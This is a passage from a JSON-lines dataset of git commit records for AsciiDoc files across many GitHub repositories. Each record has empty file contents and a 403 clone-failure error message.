2015-07-24-Very-basic-music-visualization-template.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-24-Very-basic-music-visualization-template.adoc","new_file":"_posts\/2015-07-24-Very-basic-music-visualization-template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ed98a2c22da6c168c76f8ca52b5e342a766187a","subject":"Update 2016-12-06-Episode-80-Take-the-Challenge-Brave-One.adoc","message":"Update 2016-12-06-Episode-80-Take-the-Challenge-Brave-One.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-12-06-Episode-80-Take-the-Challenge-Brave-One.adoc","new_file":"_posts\/2016-12-06-Episode-80-Take-the-Challenge-Brave-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4009d5e64874ae443637c54be88123f48534adaa","subject":"add \/reads unlisted page to link to faves when trying to start bookclubs","message":"add \/reads unlisted page to link to faves when trying to start bookclubs\n","repos":"jzacsh\/jzacsh.github.com,jzacsh\/jzacsh.github.com,jzacsh\/jzacsh.github.com","old_file":"content\/reads.adoc","new_file":"content\/reads.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/jzacsh.github.com.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe4883aa7d7081d1581d65c40f54e2653beaebfc","subject":"Update 2016-01-05-Post-de-prueba.adoc","message":"Update 2016-01-05-Post-de-prueba.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2016-01-05-Post-de-prueba.adoc","new_file":"_posts\/2016-01-05-Post-de-prueba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ed9840e07d109e36c149332cdce3cd3b6a8631c","subject":"Update 2016-08-08-Patreon-Launch.adoc","message":"Update 2016-08-08-Patreon-Launch.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-08-08-Patreon-Launch.adoc","new_file":"_posts\/2016-08-08-Patreon-Launch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baa8867aec2860449bd807887f3539e50ec7aa5f","subject":"y2b create post Thank you.","message":"y2b create post Thank you.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-18-Thank%20you..adoc","new_file":"_posts\/2018-02-18-Thank%20you..adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"829e56d028f97584b77d56cf1ea76905b63861ba","subject":"Add some notes about clean code and merging.","message":"Add some notes about clean code and merging.\n","repos":"jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"624df6b97b2d41e098c39ebc78b2643f8ee59c08","subject":"GTNPORTAL-3026 Document quickstarts release process","message":"GTNPORTAL-3026 Document quickstarts release process","repos":"jboss-developer\/jboss-portal-quickstarts,jboss-developer\/jboss-portal-quickstarts,jboss-developer\/jboss-portal-quickstarts,jboss-developer\/jboss-portal-quickstarts","old_file":"howto-release.adoc","new_file":"howto-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-developer\/jboss-portal-quickstarts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9141dbc3dbb010a0dac70c208ad9f84687edce41","subject":"Update 2015-10-25-Deadlock-and-its-prevention.adoc","message":"Update 2015-10-25-Deadlock-and-its-prevention.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-25-Deadlock-and-its-prevention.adoc","new_file":"_posts\/2015-10-25-Deadlock-and-its-prevention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c4ddac3374ec57b26084264b257c92189374cb3","subject":"Update 2017-06-13-Kotlin-Style-Guides-Coy-I-M.adoc","message":"Update 2017-06-13-Kotlin-Style-Guides-Coy-I-M.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2017-06-13-Kotlin-Style-Guides-Coy-I-M.adoc","new_file":"_posts\/2017-06-13-Kotlin-Style-Guides-Coy-I-M.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16845cd21bf111ff3e1317804e5fe99082ff402a","subject":"y2b create post DON'T Buy The Batband, Unless...","message":"y2b create post DON'T Buy The Batband, Unless...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-03-DONT-Buy-The-Batband-Unless.adoc","new_file":"_posts\/2017-12-03-DONT-Buy-The-Batband-Unless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c59ad10cc0cc0582a00df3738ce5422cb73a0f3","subject":"recent concepts changes","message":"recent concepts changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8a122f89712b3f202342b5d9831fc670cb8bb0da","subject":"Update 2016-11-09-231200-Wednesday-Remainder.adoc","message":"Update 2016-11-09-231200-Wednesday-Remainder.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-09-231200-Wednesday-Remainder.adoc","new_file":"_posts\/2016-11-09-231200-Wednesday-Remainder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2ed3baff5cd9259332afe121b5cb09d55962d90","subject":"First batch of changes to the baseDoc file","message":"First batch of changes to the baseDoc file\n","repos":"hawkular\/hawkular-metrics,mwringe\/hawkular-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,ppalaga\/hawkular-metrics,ppalaga\/hawkular-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,pilhuhn\/rhq-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,pilhuhn\/rhq-metrics,tsegismont\/hawkular-metrics,mwringe\/hawkular-metrics,jotak\/hawkular-metrics,pilhuhn\/rhq-metrics,ppalaga\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics","old_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b852fa18447b517edd2351001a4935a5ffa7cf9","subject":"Add documentation for min_hash filter (#39671)","message":"Add documentation for min_hash filter (#39671)\n\n* Add documentation for min_hash filter\r\n\r\nCloses #20757","repos":"GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/minhash-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/minhash-tokenfilter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf83e7a193b9b085d31180bb9a49a83b946836e3","subject":"Communication section.","message":"Communication section.\n","repos":"uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b47cf3473905bf8660aed4ad0ccd5a910e63e15e","subject":"Update 2019-05-28-5-Financial-pearls-of-wisdom-from-The-Intelligent-Investor-by-Benjamin-Graham.adoc","message":"Update 2019-05-28-5-Financial-pearls-of-wisdom-from-The-Intelligent-Investor-by-Benjamin-Graham.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-05-28-5-Financial-pearls-of-wisdom-from-The-Intelligent-Investor-by-Benjamin-Graham.adoc","new_file":"_posts\/2019-05-28-5-Financial-pearls-of-wisdom-from-The-Intelligent-Investor-by-Benjamin-Graham.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3ac61f11d3e9f4fc69fa10c94913b40dce1fa50","subject":"Add code of conduct","message":"Add code of conduct\n","repos":"spring-projects\/spring-social-twitter,hudsonmendes\/spring-social-twitter,hudsonmendes\/spring-social-twitter,spring-projects\/spring-social-twitter","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-social-twitter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e19495ecd254165cc173fae508060c307d61e56d","subject":"Create README.adoc","message":"Create README.adoc","repos":"ajneu\/recursive_template_inheritance_class","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/recursive_template_inheritance_class.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d26db543adeb2dfd8e98bce65e69fd40ecde81f8","subject":"wildfly instructions","message":"wildfly instructions\n","repos":"mdanter\/optaconf,ge0ffrey\/optaconf,ge0ffrey\/optaconf,oskopek\/optaconf,oskopek\/optaconf,oskopek\/optaconf,ge0ffrey\/optaconf,mdanter\/optaconf,mdanter\/optaconf","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdanter\/optaconf.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a0819b9728dabd732f65a32cd295e217fddf74e7","subject":"Add `ExtensionContext.Store.CloseableResource` to the release notes","message":"Add `ExtensionContext.Store.CloseableResource` to the release notes\n","repos":"junit-team\/junit-lambda,sbrannen\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.1.0-M2.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.1.0-M2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sbrannen\/junit-lambda.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7effca226a6e75d883a5ff4cb837c536fad08b05","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c4094bbd1bad3a874735f3325e0233120244b0f","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"702cc1d2bba263ea5d2a3a78f274e5bcbd5d5d8a","subject":"Extract SecurityContextHolder Docs","message":"Extract SecurityContextHolder Docs\n\nIssue gh-8005\n","repos":"fhanik\/spring-security,rwinch\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,fhanik\/spring-security,djechelon\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,rwinch\/spring-security,fhanik\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,djechelon\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/security-context-holder.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/security-context-holder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da0084495048b84bd7bef1c542567d2aa6890459","subject":"update","message":"update\n","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cfeb77db4b25e6b86693f474d5948b2a1f55230","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9245d786ae0cab844de4577bde67116b6cc0dab3","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62852461327be6857923c3531d1eb20d3773427d","subject":"Update 2018-01-02-Happy-New-Year.adoc","message":"Update 2018-01-02-Happy-New-Year.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-01-02-Happy-New-Year.adoc","new_file":"_posts\/2018-01-02-Happy-New-Year.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68d9b812ddbcd10b60ef3277376c8e8325fbf3d3","subject":"Define custom browsers","message":"Define custom browsers\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/14-setup-eclipse.adoc","new_file":"src\/sections\/14-setup-eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba46cf34b33f4e8cb11695a123264b8c40670ca0","subject":"git: Add an `installation` section to the readme","message":"git: Add an `installation` section to the readme\n\nThis section explains how to install the git configuration. This\nincludes caveats such as creating the $HOME\/.config folder first, so\nthat stow links *within* the folder, and not the folder itself (which\nwould prevent any other configuration from using the $HOME\/.config\nfolder).\n","repos":"PigeonF\/.dotfiles","old_file":"git\/README.adoc","new_file":"git\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1da23769c3dabd864b3a21895eea93770aa99f49","subject":"Design abstract model generation mechanism","message":"Design abstract model generation mechanism\n","repos":"dakusui\/jcunit,dakusui\/jcunit","old_file":"src\/test\/java\/com\/github\/dakusui\/jcunit8\/extras\/normalizer\/package-info.adoc","new_file":"src\/test\/java\/com\/github\/dakusui\/jcunit8\/extras\/normalizer\/package-info.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakusui\/jcunit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c19e0085a0fcb1f533440832bd0aae8c09995c13","subject":"Update 2017-03-22-El-primer-post.adoc","message":"Update 2017-03-22-El-primer-post.adoc","repos":"thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io,thefreequest\/thefreequest.github.io","old_file":"_posts\/2017-03-22-El-primer-post.adoc","new_file":"_posts\/2017-03-22-El-primer-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thefreequest\/thefreequest.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c09ebf822314728c1015a477b4be945ffa48933b","subject":"User stories 1.0 (#4361)","message":"User stories 1.0 (#4361)\n\nUser stories for 1.0\r\n\r\nCo-authored-by: k-wall <82661567142926be395d42451b0008b62207b650@apache.org>","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design\/user-stories\/shared-infra.adoc","new_file":"documentation\/design\/user-stories\/shared-infra.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EnMasseProject\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea3c953570286103ef1fb725a0464faaaf364f89","subject":"Update 2015-09-25-Start-simple.adoc","message":"Update 2015-09-25-Start-simple.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Start-simple.adoc","new_file":"_posts\/2015-09-25-Start-simple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c84563ae0fb277e8db9a175f6ed725669e2d66d9","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b77d905e8936bbdb4b1d0a90c1eeffab0ffb8f79","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c483978bd3223c9ea4f61a3080622d1d95b507b4","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c344573cfd93ba11b1266787b7c65e7082052fb","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c89fd79fc0a90196794e92a029d00c88044ff3d4","subject":"Update 2016-03-16-How-to-update-hubpress.adoc","message":"Update 2016-03-16-How-to-update-hubpress.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2016-03-16-How-to-update-hubpress.adoc","new_file":"_posts\/2016-03-16-How-to-update-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"242ec76e2088078b56a15f9682f70b3a46b90ae5","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d8f860ff11a67784084076f8da03cd2afb8059e","subject":"Init Project","message":"Init Project\n","repos":"bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bindstone\/graphbank.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a46ad0f446919628612eca95c4ef8942cfd0dc34","subject":"SEC-2951: 